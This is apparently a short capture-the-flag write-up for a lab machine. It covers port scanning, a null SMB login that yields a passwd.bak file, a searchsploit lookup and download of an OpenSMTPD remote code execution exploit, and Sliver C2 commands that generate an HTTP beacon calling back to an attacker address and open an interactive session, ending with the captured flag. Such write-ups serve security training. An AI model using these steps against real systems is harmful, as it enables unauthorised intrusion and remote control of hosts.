Enumeration
Network scanning
rustscan -a 192.168.179.71 --ulimit 5000 -- -Pn -sV --script \"'vuln'\" -oA bratarinaOutput
Open 192.168.179.71:22
Open 192.168.179.71:25
Open 192.168.179.71:80
Open 192.168.179.71:445
Port 80
No useful information found.
Port 445
Null login is allowed, which gives us a passwd.bak file.
Port 25
➜ searchsploit opensmtpd
----------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------- ---------------------------------
OpenSMTPD - MAIL FROM Remote Code Execution (Metasploit) | linux/remote/48038.rb
OpenSMTPD - OOB Read Local Privilege Escalation (Metasploit) | linux/local/48185.rb
OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution | openbsd/remote/48051.pl
OpenSMTPD 6.6.1 - Remote Code Execution | linux/remote/47984.py
OpenSMTPD 6.6.3 - Arbitrary File Read | linux/remote/48139.c
OpenSMTPD < 6.6.3p1 - Local Privilege Escalation + Remote Code Execution | openbsd/remote/48140.c
----------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Downloading the exploit
searchsploit -m linux/remote/47984.py
Exploitation
Sliver C2
Beacon generation
generate beacon --http http://192.168.45.239 --os linux --save .
Beacon listener
http
Using a beacon
use beacon-name
Making it interactive
interactive
Starting a session
sessions -i e383a747
Flag
cat flag.txt
47b47f3f1b76d3d3aa699676199c6f27